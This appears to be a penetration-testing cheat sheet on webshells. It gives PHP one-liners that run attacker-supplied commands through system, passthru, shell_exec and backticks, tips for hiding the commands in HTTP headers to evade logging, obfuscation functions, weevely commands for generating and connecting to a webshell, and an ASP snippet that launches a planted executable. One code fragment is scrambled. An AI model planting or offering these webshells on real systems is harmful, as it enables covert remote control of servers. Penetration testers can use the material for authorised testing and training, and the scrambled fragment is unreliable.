A webshell is a shell that you can access through the web. This is useful for when you have firewalls that filter outgoing traffic on ports other than port 80. As long as you have a webserver, and want it to function, you can't filter our traffic on port 80 (and 443). It is also a bit more stealthy than a reverse shell on other ports since the traffic is hidden in the http traffic.
You have access to different kinds of webshells on Kali here:
This code can be injected into pages that use php.
# Execute one command system("whoami"); # Take input from the url paramter. shell.php?cmd=whoami system($_GET['cmd']); # The same but using passthru passthru($_GET['cmd']); # For shell_exec to output the result you need to echo it echo shell_exec("whoami"); # Exec() does not output the result without echo, and only output the last line. So not very useful! echo exec("whoami"); # Instead to this if you can. It will return the output as an array, and then print it all. exec("ls -la",$array); print_r($array); # preg_replace(). This is a cool trick preg_replace('/.*/e', 'system("whoami");', ''); # Using backticks $output = `whoami`; echo "<pre>$output</pre>"; # Using backticks echo `whoami`;
You can then call then execute the commands like this:
Make it stealthy
We can make the commands from above a bit more stealthy. Instead of passing the cmds through the url, which will be obvious in logs, we cna pass them through other header-paramters. The use tampterdata or burpsuite to insert the commands. Or just netcat or curl.
'HTTP_ACCEPT_LANGUAGE']); system($_SERVER['HTTP_USER_AGENT']) # I have had to use this one echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']);system($_SERVER[
The following functions can be used to obfuscate the code.
eval() assert() base64() gzdeflate() str_rot13()
Weevely - Incredible tool!
Using weevely we can create php webshells easily.
weevely generate password /root/webshell.php
Not we execute it and get a shell in return:
weevely "http://192.168.1.101/webshell.php" password
<% Dim oS On Error Resume Next Set oS = Server.CreateObject("WSCRIPT.SHELL") Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True) %>